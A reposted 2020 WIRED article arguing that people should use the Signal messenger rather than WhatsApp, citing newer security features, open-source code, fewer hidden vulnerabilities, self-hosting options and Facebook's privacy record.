Why everyone should be using Signal instead of WhatsApp The Signal protocol underpins WhatsApp's encryption, but Facebook's ubiquitous messaging service doesn't hold a candle to Signal itself By K.G ORPHANIDES Thursday 16 April 2020 WIRED WhatsApp is the most popular communications app on the planet with over two billion users using it for messaging. Bought by Facebook in 2014, the service popularised the use of end-to-end encryption in day-to-day communications, introducing it as its default for messaging in 2016. To do so it cooperated with Moxy Marlinspike’s Open Whisper Systems to integrate the Signal encrypted messaging protocol. Microsoft and Google have also used the protocol, widely regarded as the gold standard in encrypted communications. Now Open Whisper Systems exists as Signal Messenger, LLC, and is part of the Signal Foundation. This rebranding has seen the foundation put more effort into its own app. The Signal Foundation's flagship Signal app provides fully-fledged and easy to use secure communications in its own right. It has direct and group messaging, as well as one-to-one audio and video chat, and there are very good reasons to opt for secure messaging's Cool Original flavour over WhatsApp. In February, the European Commission advised its staff to do exactly that. Here’s why you should use Signal for any conversation where privacy matters – even if that’s just giving your family the shared Disney+ password – and why your friends should, too. 1. Signal has more up-to-date security features New security features come to Signal first. For example, Signal has had disappearing messages – which are automatically deleted after a specified period of time – since 2016 but the feature is still being tested with small numbers of WhatsApp users. Other mainstream and beta Signal features that WhatsApp users don’t have include view-oncemedia messages, encrypted profiles, an incognito keyboard switch for Android to keep Gboard from sending your typing history back to Google, and backups that don’t default to unencrypted storage in Google Drive or Apple iCloud. Signal also has a slightly broader range of clients, with a dedicated client for Linux desktop users – likely to appeal to those in the security and data analysis fields, while WhatsApp directs them to its web app. 2. Signal is open source All of Signal’s source code is published for anyone to examine and use under a GPLv3 license for clients and an AGPLv3 license for the server. This means that you can see what’s going on inside it – or, more usefully, rely on the specialist expertise of people who review the code and know exactly what they’re looking for. 3. Signal has less potential for hidden vulnerabilities As a larger platform, WhatsApp is more inviting to malicious actors to start with, but the fact that its codebase is a proprietary closed box means that it may take longer for dangerous vulnerabilities to be detected. Any application can and eventually will suffer vulnerabilities – Signal has resolved a few of its own. But WhatsApp’s closed-source code (beyond its use of the open Signal protocol) means that there are a lot of potential targets that remain unknown until they’re exploited. A particularly worrying example was a vulnerability in WhatsApp’s VoIP stack, used by intelligence agencies to inject spyware in 2019. 4. You can run your own Signal server (but probably shouldn’t) Another advantage of open source software is that you can play with it, if you’re that way inclined. You probably won’t want or need a Signal server of your own for either personal or business reasons. It’s designed as a mass communications platform and isn’t really intended to scale down, it’s a pain to build and there are currently no containerised versions for easy deployment. But if you’re technically minded, you can learn a lot about how a system functions by building a test instance and poking it with a stick. It’s non-trivial, but community guides are available to help users get a Signal server up and running and some interesting forks exist, including a decentralised messaging system. 5. How much can you trust Facebook? Perhaps the most compelling reason to use Signal is Facebook's long-standing lack of respect for its users' privacy. Facebook has an appalling history when it comes to data collection and handling, from the Cambridge Analytica affair to its practice of sharing data about users with phone manufacturers. It’s already proved that it can’t be trusted with WhatsApp user data that should, under EU law, have remained private. In 2017, European regulators took action against Facebook for sharing the WhatsApp users’ phone numbers with its Facebook social network for advertising purposes. Firmly in breach of data protection regulations, it was an opt-out rather than opt-in system. Facebook had previously claimed such a mechanism would never be implemented. WhatsApp co-developer Brian Acton, who left Facebook in 2017 and went on to co-found the Signal Foundation with Marlinspike, has harshly criticised Facebook’s approach to privacy and revealed that Facebook coached him “to explain that it would be really difficult to merge or blend data between [WhatsApp and Facebook]” when giving information to EU regulators in 2014. Facebook’s desire to insert adverts and commercial messaging into WhatsApp and potentially compromise its security prompted Acton to leave Facebook early, sacrificing some $850 million in stock in the process. Acton’s fellow WhatsApp dev, Jan Koum, also walked out on Facebook following reported disputes with the company over its efforts to weaken encryption. Mark Zuckerberg has since publicly supported end-to-end encryption, saying it will also be added to its Messenger app. Facebook was until recently still vacillating over plans to introduce adverts to WhatsApp, with the latest reports indicating that the plan has finally been scrapped. Although it's not clear what will eventually happen to the service when Facebook merges WhatsApp with Instagram messaging and Messenger. Sursa: https://www.wired.co.uk/article/signal-vs-whatsapp